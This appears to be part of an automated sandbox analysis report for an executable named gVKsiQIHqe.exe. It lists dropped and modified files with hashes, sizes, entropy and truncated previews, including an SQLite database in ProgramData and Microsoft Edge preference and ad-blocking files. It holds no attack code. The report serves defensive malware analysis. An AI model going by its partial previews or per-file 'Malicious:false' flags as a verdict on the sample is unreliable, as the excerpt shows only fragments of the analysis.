                                                                                                                                                                                                                                                                                    Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\Z5PPP8

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1e738fd0-65c9-4ef6-881c-d090745a06f4.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44628
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.096513790721801
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBlwuzhDO6vP6OrhRQcp8bc85cGoup1Xl3jVzXr4CW:z/Ps+wsI7ynE06Lqchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:15E3922E8752C84BC997EC973F9B2B87
                                                                                                                                                                                                                                                                                    SHA1:27B22FEC5597F2BC059AAA82BEEACDE0CFB31A0C
                                                                                                                                                                                                                                                                                    SHA-256:7672E393B783071174B675F6F5214BC8034BA97F03E34966D907C35F9B3DC5A5
                                                                                                                                                                                                                                                                                    SHA-512:5BCADF5B0CEA887BD43BBBEE84CB16A63C470224A82F33EE49F0104EB07A63321FEFB4202BDFAA9C43666FD6DA14143B102FAF8AC239C6537A355DBE14BE2AE5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4d1d7eec-7c02-422d-a186-269c340815ed.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44710
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.095682108607961
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkB1wuzhDO6vP6OrhR8qLKvFwcGoup1Xl3jVzXr4CCz:z/Ps+wsI7yOEE6L/chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:5E334A31CCDBDC3C8EFB75BEDB26575B
                                                                                                                                                                                                                                                                                    SHA1:E0C6DD26C4927742075167E6FE920210E6B9D261
                                                                                                                                                                                                                                                                                    SHA-256:60479771555DDE8FB238E2435E451640EAA76ED96571E53733352F6AE9978B93
                                                                                                                                                                                                                                                                                    SHA-512:99490F67FC68AE2C61386DF08D024A462F958DCBD15394F7FD14A982CB27B411FB8B5EF31CF8393365E222488519420524B44882DD9E68E3B06A5D0EFD6212B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\50784524-31bc-4607-98ae-fc27ead95288.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):44628
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.096513790721801
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBlwuzhDO6vP6OrhRQcp8bc85cGoup1Xl3jVzXr4CW:z/Ps+wsI7ynE06Lqchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:15E3922E8752C84BC997EC973F9B2B87
                                                                                                                                                                                                                                                                                    SHA1:27B22FEC5597F2BC059AAA82BEEACDE0CFB31A0C
                                                                                                                                                                                                                                                                                    SHA-256:7672E393B783071174B675F6F5214BC8034BA97F03E34966D907C35F9B3DC5A5
                                                                                                                                                                                                                                                                                    SHA-512:5BCADF5B0CEA887BD43BBBEE84CB16A63C470224A82F33EE49F0104EB07A63321FEFB4202BDFAA9C43666FD6DA14143B102FAF8AC239C6537A355DBE14BE2AE5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5df7e85d-f253-47c8-a6bc-72651d5c197b.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):45822
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.088049074645876
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:mMkbJrT8IeQc5d9FhvuAhDO6vP6OrhR8qLKvFwycfCAoGGoup1Xl3jVzXr4QK:mMk1rT8H19FI6L/FRoGhu3VlXr4d
                                                                                                                                                                                                                                                                                    MD5:D20DCA2F2AA31D2216FB9DA48EC2CC7D
                                                                                                                                                                                                                                                                                    SHA1:44FE74F10B888F36627EBDFCE71FD64F0BA66EE1
                                                                                                                                                                                                                                                                                    SHA-256:F44CCBDE1C045A0B8B5246DDE86837F59640086B85856498C9E6AD9113C7DFB7
                                                                                                                                                                                                                                                                                    SHA-512:07DE4543DD947DE6658613360158AC5CC2B91254EC5F879A21A774027E03172EBA805FAA4A5DF6E2D28350A2E914CF32B56D8C18412F14C0CF78ABB8293DE7BD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6aa2c7e0-1661-49cd-9573-33962486ae88.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090741681997585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEx6Ltbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:A23AFFFB2AD172F8A25DFBB6C88DEBE5
                                                                                                                                                                                                                                                                                    SHA1:1E6011053C61C791E9D7A02A0388E721DE1976C8
                                                                                                                                                                                                                                                                                    SHA-256:5DD06868735CEAB9CD4F0BB65D7B6758B03B186C523E0C97FCE07720846B5433
                                                                                                                                                                                                                                                                                    SHA-512:427E889ED37A9F26B422346AA275D8E735F74EC8F1DB321DCA0B9A8E137F0649284D974B2969C7F47706A49721357EC03CB94C66752A833B943C4990355D87AB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\946eb2da-0388-4a9b-8657-af8e7ed06564.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):45899
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08798709171774
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:mMkbJrT8IeQc5z9FhvuAhDO6vP6OrhRQqLKvFwycfCAoGGoup1Xl3jVzXr4QK:mMk1rT8HL9FI6LzFRoGhu3VlXr4d
                                                                                                                                                                                                                                                                                    MD5:50D98BF5C8A418324967CB5AC17FD5D1
                                                                                                                                                                                                                                                                                    SHA1:373FF113938C7C27672ECA149DD2B4C668E8B4C3
                                                                                                                                                                                                                                                                                    SHA-256:791D30B93231C02345F8070524E82C004400F18F4E7685001640375272A9492B
                                                                                                                                                                                                                                                                                    SHA-512:EBEB97D6949E401E6F2A226FFFAEF0B81DCADF13ED6B91162CCA0D2E96ACA144439DBF70ED6D4CC8A503FF3906F1F7B3BC8326CAEFFC0DDDC9BBAEA333B20E4A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\4d969082-cf51-47f1-90ec-5a03b6e23158.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                    MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                    SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                    SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                    SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                    MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                    SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                    SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                    SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                                                                                    MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                    SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                    SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                    SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                                                                                    MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                    SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                    SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                    SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                    Malicious:false
